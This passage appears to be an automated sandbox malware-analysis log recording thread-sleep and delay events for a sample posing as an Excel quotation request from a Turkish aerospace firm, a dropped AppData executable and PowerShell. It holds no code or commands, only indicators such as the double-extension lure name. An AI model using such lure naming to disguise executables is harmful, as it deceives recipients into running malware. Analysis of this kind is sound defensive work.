Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 597922
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 597812
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 597703
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 597593
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 597484
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 597375
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 597265
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 597156
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 597047
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 596937
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 596822
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 596718
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 596609
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 596491
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 596346
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 596218
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 596108
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 595997
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 595890
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 595781
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 595671
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 595562
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 595453
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 595343
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 595234
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 595125
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 595015
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 594906
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 594797
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 594687
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Thread delayed: delay time: 594578

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Window / User API: threadDelayed 1825	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Window / User API: threadDelayed 614	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6929	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 410	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7939	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1485	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Window / User API: threadDelayed 1627	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Window / User API: threadDelayed 941	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Window / User API: threadDelayed 2117	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe	Window / User API: threadDelayed 7730	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Window / User API: threadDelayed 8332
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe	Window / User API: threadDelayed 1526

Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324	Thread sleep time: -239883s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324	Thread sleep time: -239765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324	Thread sleep time: -239651s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324	Thread sleep time: -239546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324	Thread sleep time: -239435s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324	Thread sleep time: -239328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324	Thread sleep time: -239219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324	Thread sleep time: -239109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324	Thread sleep time: -239000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324	Thread sleep time: -238883s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324	Thread sleep time: -238688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324	Thread sleep time: -238463s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324	Thread sleep time: -238156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324	Thread sleep time: -237989s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324	Thread sleep time: -237859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4324	Thread sleep time: -237664s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 4088	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1680	Thread sleep count: 6929 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3872	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5740	Thread sleep count: 410 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6256	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5328	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 764	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212	Thread sleep time: -239812s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212	Thread sleep time: -239702s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212	Thread sleep time: -239589s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212	Thread sleep time: -239469s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212	Thread sleep time: -239360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212	Thread sleep time: -239247s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212	Thread sleep time: -239137s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212	Thread sleep time: -238992s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212	Thread sleep time: -238504s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212	Thread sleep time: -238384s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212	Thread sleep time: -238278s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212	Thread sleep time: -238170s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212	Thread sleep time: -238047s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7212	Thread sleep time: -237935s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7360	Thread sleep count: 2117 > 30	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7360	Thread sleep count: 7730 > 30	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -599560s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -599344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -598891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -597797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -597465s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -597344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -597234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -597125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -597015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -596906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -596797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -596687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -596575s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -596469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -596359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -596250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -596140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -596030s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -595922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -595812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -595703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -595594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -595484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -595375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -595265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -595156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -595042s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -594922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -594812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -594703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe TID: 7316	Thread sleep time: -594594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep count: 33 > 30
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7484	Thread sleep count: 8332 > 30
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7484	Thread sleep count: 1526 > 30
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -599773s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -599671s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -599562s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -599453s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -599343s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -599231s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -599125s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -599015s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -598903s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -598797s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -598687s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -598576s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -598468s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -598359s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -598250s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -598140s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -598031s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -597922s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -597812s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -597703s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -597593s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -597484s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -597375s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -597265s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -597156s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -597047s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -596937s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -596822s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -596718s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -596609s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -596491s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -596346s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -596218s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -596108s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -595997s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -595890s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -595781s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -595671s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -595562s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -595453s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -595343s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -595234s >= -30000s
Source: C:\Users\user\AppData\Roaming\WheTgQY.exe TID: 7480	Thread sleep time: -595125s >= -30000s
